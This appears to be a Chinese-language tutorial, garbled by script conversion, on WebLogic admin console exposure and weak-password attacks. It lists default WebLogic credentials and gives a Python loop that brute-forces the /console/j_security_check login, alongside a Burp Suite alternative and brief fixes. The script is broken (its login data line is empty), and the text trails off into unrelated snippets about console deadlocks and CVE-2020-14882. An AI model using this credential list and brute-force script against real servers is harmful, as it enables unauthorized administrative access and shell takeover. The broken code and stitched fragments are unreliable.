2 漏洞原理分析
3 漏洞復現
4 漏洞修復
5 其他
要了解這個漏洞首先我們要了解乙個概念,什麼是web伺服器控制台,它有什麼作用和影響:
對於weblogic控制台來講:weblogic有乙個web端的管理控制台,關於weblogic的操作、web服務的配置及程式管理等都可以通過這個控制台進行操作。
由於各種web中介軟體預設路徑可能都存在控制台頁面路徑洩露的情況,這就是我們的乙個攻擊面,一旦我們可以獲取到這個控制台許可權,我們就可以對**進行一些高危操作。
風險等級:
【高危】:可訪問預設中介軟體控制台,且能過成功獲取 shell。
【中危】:可訪問預設中介軟體控制台,並成功登入,但無法獲取 shell。
【低危】:可訪問預設中介軟體控制台,但無法登入且無法執行危險操作。
1:如果產品部署了控制台功能,並且模組路徑為預設路徑,就存在控制台路徑的洩露問題。
weblogic控制台預設路徑:
2:如果控制台的頁面賬戶密碼為預設賬戶名和密碼,則存在弱口令的問題。
welogic預設賬戶名和密碼:weblogic』, 『weblogic』, 『oracle@123』, 『password』, 『system』, 『administrator』, 『admin』, 『security』, 『joe』, 『wlcsystem』, 『wlpisystem』
通過上述分析,我們發現可以通過探訪web伺服器控制台介面的預設路徑,來檢視是否開啟了這個控制台頁面,如果存在,我們再進行預設密碼爆破。
weblogic版本:10.3.6(11g)
step1:手動登入或使用指令碼探索weblogic控制台預設路徑
1:方式一:手動登入:
2:方式二:使用指令碼:
step2:對賬戶密碼進行爆破
方式一:使用指令碼進行爆破
def weakpasswd(self):
"""weak password"""
pwddict = ['weblogic', 'weblogic', 'oracle@123', 'password', 'system', 'administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem']
for user in pwddict:
for pwd in pwddict:
data =
req = requests.post(self.url+':7001/console/j_security_check', data=data, allow_redirects=false, verify=false)
if req.status_code == 302 and 'console' in req.text and 'loginform.jsp' not in req.text:
print('[+] weblogic username: '+user+' password: '+pwd)
方式二:使用burpsuite進行密碼爆破
1:如果遠端部署功能的確需要,建議修改預設的模組名稱。
2:修改控制台密碼
這個控制台密碼的加密方式為weblogic密碼使用aes(老版本3des)加密,對稱加密可解密,只需要找到使用者的密文與加密時的金鑰即可;則會部分我們後續再進行操作
weblogic控制台死鎖解決方法
當通過命令重啟控制台,如果連續多次stopadmin,多次startadmin,會造成admin lock 這時候,應該採取如下措施 確保重啟控制台.1.通過命令 startadmin 嘗試啟動控制台.2.呼叫命令 tailadminserver 檢視當前輸出資訊 如果依舊啟動失敗,嘗試使用 sta...
Weblogic啟動成功,控制台打不開
有時候,我們在linux作業系統上成功啟動了weblogic,也檢視了7001埠的狀態是開啟的。但是訪問weblogic控制台沒有反應,也沒有報錯。使用 netstat ano grep 7001 檢視埠的狀態 可是訪問weblogic控制台,還是沒有反應。我們在本地ping 192.168.100...
Weblogic 管理控制台未授權遠端命令執行漏洞
weblogic是oracle公司推出的j2ee應用伺服器。在2020年10月的更新中,oracle官方修復了兩個長亭科技安全研究員 voidfyoo 提交的安全漏洞,分別是cve 2020 14882和cve 2020 14883。cve 2020 14882允許未授權的使用者繞過管理控制台的許可...